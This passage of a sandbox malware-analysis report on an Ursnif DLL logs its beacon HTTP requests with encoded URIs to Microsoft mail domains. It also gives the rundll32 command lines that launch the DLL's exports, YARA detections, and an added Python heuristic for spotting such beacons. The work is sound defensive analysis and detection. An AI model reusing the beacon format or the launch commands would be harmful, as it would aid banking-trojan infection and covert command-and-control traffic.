request-id: c3fa3534-2a41-defd-77a3-b7d5d429dca3
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
X-FEServer: AS8PR04CA0135
X-RequestId: 54b63e23-b4ac-4253-abee-fb10f42b5290
MS-CV: NDX6w0Eq/d53o7fV1Cncow.0
X-Powered-By: ASP.NET
X-FEServer: AS8PR04CA0135
Date: Mon, 11 Oct 2021 22:37:49 GMT
Connection: close
Content-Length: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
4 | 192.168.2.3 | 49786 | 52.97.151.2 | 443 | C:\Windows\System32\loaddll32.exe
Timestamp | kBytes transferred | Direction | Data
2021-10-11 22:37:50 UTC | 5 | OUT | GET /signup/liopolo/Lf_2Fg8f5c_2BK6/Zu9U0t2ZcTswwewFAO/OEv2PKFbN/z8b4kNhG7zvHccOv8idc/Knnm9TAFaDWeAkZRt7S/s_2FJY_2FJZ_2FiFjgDZcG/X_2FPaS4UIfT5/mU_2B6qd/RThDpvlqtg_2B_2FquXT6Oc/rU7JT5JO40/2bdRvqEsO2i_2Fk7a/RPdp6h9XEAxz/UCoD0GwK5aa/_2BLPCSSipSRAr/lNUH_2BVSP8NW1a0oO1V8/mPc3sf.jre HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
Host: outlook.office365.com
2021-10-11 22:37:50 UTC | 5 | IN | HTTP/1.1 404 Not Found
Content-Length: 1245
Content-Type: text/html
Server: Microsoft-IIS/10.0
request-id: 6f408bdb-1e4d-c6ec-fa40-6761089e1892
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
X-CalculatedFETarget: DB9PR05CU001.internal.outlook.com
X-BackEndHttpStatus: 404
X-FEProxyInfo: DB9PR05CA0008.EURPRD05.PROD.OUTLOOK.COM
X-CalculatedBETarget: DB8P195MB0662.EURP195.PROD.OUTLOOK.COM
X-BackEndHttpStatus: 404
X-RUM-Validated: 1
X-Proxy-RoutingCorrectness: 1
X-Proxy-BackendServerStatus: 404
MS-CV: 24tAb00e7Mb6QGdhCJ4Ykg.1.1
X-FEServer: DB9PR05CA0008
X-Powered-By: ASP.NET
X-FEServer: AM6P195CA0054
Date: Mon, 11 Oct 2021 22:37:50 GMT
Connection: close
2021-10-11 22:37:50 UTC | 6 | IN | Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>404 - Fil


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
5 | 192.168.2.3 | 49787 | 40.97.153.146 | 443 | C:\Windows\System32\loaddll32.exe
Timestamp | kBytes transferred | Direction | Data
2021-10-11 22:37:54 UTC | 7 | OUT | GET /signup/liopolo/tu_2FZBOhZEm_2BjC/Eeo1dbfGyNRA/5gxX_2BPT_2/FeU0eiO3g8_2Bd/o4ft4FEXI0SSJqvx69bYX/i59sx_2FafiNLas1/YucQw3tAlQFb4zA/iKo5z_2FddgGxYO4HP/KUIXOky8_/2FKdBAX0DuXXgI2ZfYY9/kP9v63o8avKNpLR1Vuu/u_2F4VkGFpqAysszotqEDO/434zYCc87r2Kg/mFe.jre HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
Host: outlook.com
2021-10-11 22:37:54 UTC | 7 | IN | HTTP/1.1 301 Moved Permanently
Cache-Control: no-cache
Pragma: no-cache
Location: https://www.outlook.com/signup/liopolo/tu_2FZBOhZEm_2BjC/Eeo1dbfGyNRA/5gxX_2BPT_2/FeU0eiO3g8_2Bd/o4ft4FEXI0SSJqvx69bYX/i59sx_2FafiNLas1/YucQw3tAlQFb4zA/iKo5z_2FddgGxYO4HP/KUIXOky8_/2FKdBAX0DuXXgI2ZfYY9/kP9v63o8avKNpLR1Vuu/u_2F4VkGFpqAysszotqEDO/434zYCc87r2Kg/mFe.jre
Server: Microsoft-IIS/10.0
request-id: 1c02960a-5ced-da3d-b337-630db25d6655
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
X-FEServer: BN6PR2001CA0016
X-RequestId: 39c1572a-5c8b-45d3-91d9-fe16156d0cde
MS-CV: CpYCHO1cPdqzN2MNsl1mVQ.0
X-Powered-By: ASP.NET
X-FEServer: BN6PR2001CA0016
Date: Mon, 11 Oct 2021 22:37:54 GMT
Connection: close
Content-Length: 0


Session ID: 6
Source IP: 192.168.2.3
Source Port: 49788
Destination IP: 52.97.135.82
Destination Port: 443
Process: C:\Windows\SysWOW64\rundll32.exe

Timestamp: 2021-10-11 22:37:54 UTC | kBytes transferred: 8 | Direction: OUT
Data:
GET /signup/liopolo/tu_2FZBOhZEm_2BjC/Eeo1dbfGyNRA/5gxX_2BPT_2/FeU0eiO3g8_2Bd/o4ft4FEXI0SSJqvx69bYX/i59sx_2FafiNLas1/YucQw3tAlQFb4zA/iKo5z_2FddgGxYO4HP/KUIXOky8_/2FKdBAX0DuXXgI2ZfYY9/kP9v63o8avKNpLR1Vuu/u_2F4VkGFpqAysszotqEDO/434zYCc87r2Kg/mFe.jre HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
Host: www.outlook.com

Timestamp: 2021-10-11 22:37:54 UTC | kBytes transferred: 8 | Direction: IN
Data:
HTTP/1.1 301 Moved Permanently
Cache-Control: no-cache
Pragma: no-cache
Location: https://outlook.office365.com/signup/liopolo/tu_2FZBOhZEm_2BjC/Eeo1dbfGyNRA/5gxX_2BPT_2/FeU0eiO3g8_2Bd/o4ft4FEXI0SSJqvx69bYX/i59sx_2FafiNLas1/YucQw3tAlQFb4zA/iKo5z_2FddgGxYO4HP/KUIXOky8_/2FKdBAX0DuXXgI2ZfYY9/kP9v63o8avKNpLR1Vuu/u_2F4VkGFpqAysszotqEDO/434zYCc87r2Kg/mFe.jre
Server: Microsoft-IIS/10.0
request-id: b55e2ee9-77cf-8398-8a20-712ba510b8df
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
X-FEServer: AS9PR06CA0316
X-RequestId: f805bbde-3773-4bdb-acdb-50b7012df842
MS-CV: 6S5etc93mIOKIHErpRC43w.0
X-Powered-By: ASP.NET
X-FEServer: AS9PR06CA0316
Date: Mon, 11 Oct 2021 22:37:53 GMT
Connection: close
Content-Length: 0


Session ID: 7
Source IP: 192.168.2.3
Source Port: 49789
Destination IP: 40.101.60.226
Destination Port: 443
Process: C:\Windows\SysWOW64\rundll32.exe

Timestamp: 2021-10-11 22:37:54 UTC | kBytes transferred: 9 | Direction: OUT
Data:
GET /signup/liopolo/tu_2FZBOhZEm_2BjC/Eeo1dbfGyNRA/5gxX_2BPT_2/FeU0eiO3g8_2Bd/o4ft4FEXI0SSJqvx69bYX/i59sx_2FafiNLas1/YucQw3tAlQFb4zA/iKo5z_2FddgGxYO4HP/KUIXOky8_/2FKdBAX0DuXXgI2ZfYY9/kP9v63o8avKNpLR1Vuu/u_2F4VkGFpqAysszotqEDO/434zYCc87r2Kg/mFe.jre HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
Host: outlook.office365.com

Timestamp: 2021-10-11 22:37:54 UTC | kBytes transferred: 10 | Direction: IN
Data:
HTTP/1.1 404 Not Found
Content-Length: 1245
Content-Type: text/html
Server: Microsoft-IIS/10.0
request-id: 0ad922d7-711b-417c-0004-37a25225c4ea
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
X-CalculatedFETarget: DU2PR04CU012.internal.outlook.com
X-BackEndHttpStatus: 404
X-FEProxyInfo: DU2PR04CA0336.EURPRD04.PROD.OUTLOOK.COM
X-CalculatedBETarget: DB7P194MB0346.EURP194.PROD.OUTLOOK.COM
X-BackEndHttpStatus: 404
X-RUM-Validated: 1
X-Proxy-RoutingCorrectness: 1
X-Proxy-BackendServerStatus: 404
MS-CV: 1yLZChtxfEEABDeiUiXE6g.1.1
X-FEServer: DU2PR04CA0336
X-Powered-By: ASP.NET
X-FEServer: AM5P194CA0019
Date: Mon, 11 Oct 2021 22:37:54 GMT
Connection: close

Timestamp: 2021-10-11 22:37:54 UTC | kBytes transferred: 10 | Direction: IN
Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c
Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>404 - Fil
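The three sessions above are the same beacon URI walked through two 301 redirects to a 404: the destinations are Microsoft's own domains and serve nothing, so an allow-list keyed on the destination host alone would pass this traffic. The indicators that remain are in the request itself. The following Python is an added example written for this report, not code from Joe Sandbox or from the sample; it scores requests on what the sessions actually show: the underscore-escaped base64 tokens in the URI (reading `_2F`/`_2B` as percent-encoded `/` and `+` is taken from public ISFB/Gozi write-ups, not from this report), the path depth and decoy `.jre` extension, the MSIE 8.0 user agent on Windows NT 10.0, and the process that opened the socket. The LOLBin list, the weights and the threshold are assumptions chosen for illustration, and the benign request is constructed.

```python
import re
from dataclasses import dataclass, field

# The beacon URI exactly as it appears in sessions 5-7 of this report.
URSNIF_PATH = (
    "/signup/liopolo/tu_2FZBOhZEm_2BjC/Eeo1dbfGyNRA/5gxX_2BPT_2/FeU0eiO3g8_2Bd/"
    "o4ft4FEXI0SSJqvx69bYX/i59sx_2FafiNLas1/YucQw3tAlQFb4zA/iKo5z_2FddgGxYO4HP/"
    "KUIXOky8_/2FKdBAX0DuXXgI2ZfYY9/kP9v63o8avKNpLR1Vuu/u_2F4VkGFpqAysszotqEDO/"
    "434zYCc87r2Kg/mFe.jre"
)
URSNIF_UA = "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)"

# Binaries that have no reason to speak HTTP on their own (assumed list for this example;
# loaddll32.exe is deliberately absent because it is the sandbox's own loader).
LOLBIN_PROCESSES = {"rundll32.exe", "regsvr32.exe", "mshta.exe", "wscript.exe"}


@dataclass
class HttpRequest:
    process: str      # image name of the process that opened the socket
    host: str
    path: str
    user_agent: str


@dataclass
class Verdict:
    score: int = 0
    reasons: list = field(default_factory=list)

    def hit(self, points: int, why: str) -> None:
        self.score += points
        self.reasons.append(why)


def path_segments(path: str) -> list:
    return [s for s in path.split("/") if s]


def escaped_base64_chars(path: str) -> int:
    """Count '_2F', '_2B' and '_3D' tokens: percent-encoded '/', '+' and '=' with the '%'
    swapped for '_', which public ISFB/Gozi reporting describes as how the bot hides
    base64 data in its URI (an assumption here, not a statement of this report).
    Separators are stripped first because '/' is inserted at arbitrary points and can
    split a token, as in '.../KUIXOky8_/2FKdBAX...' above."""
    flat = "".join(path_segments(path))
    return len(re.findall(r"_2[FB]|_3D", flat))


def analyse(req: HttpRequest) -> Verdict:
    v = Verdict()
    segs = path_segments(req.path)
    n = escaped_base64_chars(req.path)
    if n >= 2:
        v.hit(3, f"{n} underscore-escaped base64 characters in URI path")
    if len(segs) >= 8 and re.search(r"\.(jre|jpg|gif|png|js|css|bmp)$", req.path, re.I):
        v.hit(2, f"{len(segs)} random-looking path segments ending in a decoy extension")
    # IE 5-9 never ran on Windows 10, and IE11 on Windows 10 sends no 'MSIE' token
    # unless it is in compatibility view, so this is strong but not conclusive.
    if re.search(r"MSIE [5-9]\.\d+; Windows NT 10\.0", req.user_agent):
        v.hit(2, "User-Agent claims MSIE 5-9 on Windows NT 10.0")
    if req.process.lower() in LOLBIN_PROCESSES:
        v.hit(3, f"request originated from {req.process}")
    return v


def triage(requests: list, threshold: int = 5) -> list:
    """Return (host, score, reasons) for every request scoring at or above threshold."""
    out = []
    for r in requests:
        v = analyse(r)
        if v.score >= threshold:
            out.append((r.host, v.score, v.reasons))
    return out


# Constructed sample set: the three sessions above plus one benign browser request.
SAMPLES = [
    HttpRequest("loaddll32.exe", "outlook.com", URSNIF_PATH, URSNIF_UA),
    HttpRequest("rundll32.exe", "www.outlook.com", URSNIF_PATH, URSNIF_UA),
    HttpRequest("rundll32.exe", "outlook.office365.com", URSNIF_PATH, URSNIF_UA),
    HttpRequest("msedge.exe", "www.example.com", "/index.html",
                "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 "
                "Chrome/94.0 Safari/537.36"),
]

if __name__ == "__main__":
    for host, score, reasons in triage(SAMPLES):
        print(f"{host}: score {score}")
        for why in reasons:
            print(f"  - {why}")
```

The weights are deliberately additive rather than any single hard rule: a redirect chain ending at a 404 on a Microsoft domain is not itself suspicious, and a legacy user agent alone is not either, but the combination of an impossible UA, a LOLBin client and a sixteen-segment path of escaped base64 is hard to explain benignly.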


                                                                                      System Behavior

General

Start time: 00:36:08
Start date: 12/10/2021
Path: C:\Windows\System32\loaddll32.exe
Wow64 process (32bit): true
Commandline: loaddll32.exe 'C:\Users\user\Desktop\m87xfb63XU.dll'
Imagebase: 0x820000
File size: 893440 bytes
MD5 hash: 72FCD8FB0ADC38ED9050569AD673650E
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.527111263.0000000003B28000.00000004.00000040.sdmp, Author: Joe Security
• Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.527630553.0000000003B28000.00000004.00000040.sdmp, Author: Joe Security
• Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.615631858.00000000038AD000.00000004.00000040.sdmp, Author: Joe Security
• Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.527327468.0000000003B28000.00000004.00000040.sdmp, Author: Joe Security
• Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.527187841.0000000003B28000.00000004.00000040.sdmp, Author: Joe Security
• Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.659429998.00000000037AF000.00000004.00000040.sdmp, Author: Joe Security
• Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.527048423.0000000003B28000.00000004.00000040.sdmp, Author: Joe Security
• Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.570679066.00000000039AB000.00000004.00000040.sdmp, Author: Joe Security
• Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000000.00000002.696204071.0000000003579000.00000004.00000040.sdmp, Author: Joe Security
• Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.526903678.0000000003B28000.00000004.00000040.sdmp, Author: Joe Security
• Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000000.00000003.491247065.0000000001430000.00000040.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.527256439.0000000003B28000.00000004.00000040.sdmp, Author: Joe Security
• Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.526968624.0000000003B28000.00000004.00000040.sdmp, Author: Joe Security
• Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.527017763.0000000003B28000.00000004.00000040.sdmp, Author: Joe Security
Reputation: moderate

General

Start time: 00:36:08
Start date: 12/10/2021
Path: C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit): true
Commandline: cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\m87xfb63XU.dll',#1
Imagebase: 0xd80000
File size: 232960 bytes
MD5 hash: F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

General

Start time: 00:36:08
Start date: 12/10/2021
Path: C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit): true
Commandline: rundll32.exe C:\Users\user\Desktop\m87xfb63XU.dll,BeGrass
Imagebase: 0x290000
File size: 61952 bytes
MD5 hash: D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000002.00000003.453838951.0000000002A00000.00000040.00000001.sdmp, Author: Joe Security
Reputation: high

General

Start time: 00:36:09
Start date: 12/10/2021
Path: C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit): true
Commandline: rundll32.exe 'C:\Users\user\Desktop\m87xfb63XU.dll',#1
Imagebase: 0x290000
File size: 61952 bytes
MD5 hash: D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.531230770.00000000055A8000.00000004.00000040.sdmp, Author: Joe Security
• Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.531464419.00000000055A8000.00000004.00000040.sdmp, Author: Joe Security
• Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000003.00000002.697257309.0000000004D39000.00000004.00000040.sdmp, Author: Joe Security
• Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000003.00000003.454711091.0000000002E70000.00000040.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.576012668.000000000542B000.00000004.00000040.sdmp, Author: Joe Security
• Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.531480606.00000000055A8000.00000004.00000040.sdmp, Author: Joe Security
• Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.531370717.00000000055A8000.00000004.00000040.sdmp, Author: Joe Security
• Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.531284421.00000000055A8000.00000004.00000040.sdmp, Author: Joe Security
• Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.531412078.00000000055A8000.00000004.00000040.sdmp, Author: Joe Security
• Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.531686708.00000000055A8000.00000004.00000040.sdmp, Author: Joe Security
• Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.531172047.00000000055A8000.00000004.00000040.sdmp, Author: Joe Security
• Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.624467221.000000000532D000.00000004.00000040.sdmp, Author: Joe Security
• Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.667937639.000000000522F000.00000004.00000040.sdmp, Author: Joe Security
• Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.531440376.00000000055A8000.00000004.00000040.sdmp, Author: Joe Security
Reputation: high

General

Start time: 00:36:13
Start date: 12/10/2021
Path: C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit): true
Commandline: rundll32.exe C:\Users\user\Desktop\m87xfb63XU.dll,Fieldeight
Imagebase: 0x290000
File size: 61952 bytes
MD5 hash: D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000005.00000003.476882523.0000000002DC0000.00000040.00000001.sdmp, Author: Joe Security
Reputation: high

General

Start time: 00:36:20
Start date: 12/10/2021
Path: C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit): true
Commandline: rundll32.exe C:\Users\user\Desktop\m87xfb63XU.dll,Often
Imagebase: 0x290000
File size: 61952 bytes
MD5 hash: D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000006.00000003.488040276.0000000002650000.00000040.00000001.sdmp, Author: Joe Security
Reputation: high

General

Start time: 00:37:49
Start date: 12/10/2021
Path: C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit): true
Commandline: C:\Windows\SysWOW64\WerFault.exe -u -p 4668 -s 632
Imagebase: 0xef0000
File size: 434592 bytes
MD5 hash: 9E2B8ACAD48ECCA55C0230D63623661B
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

General

Start time: 00:37:55
Start date: 12/10/2021
Path: C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit): true
Commandline: C:\Windows\SysWOW64\WerFault.exe -u -p 4596 -s 640
Imagebase: 0xef0000
File size: 434592 bytes
MD5 hash: 9E2B8ACAD48ECCA55C0230D63623661B
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

General

Start time: 00:37:59
Start date: 12/10/2021
Path: C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit): true
Commandline: C:\Windows\SysWOW64\WerFault.exe -u -p 4348 -s 640
Imagebase: 0xef0000
File size: 434592 bytes
MD5 hash: 9E2B8ACAD48ECCA55C0230D63623661B
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
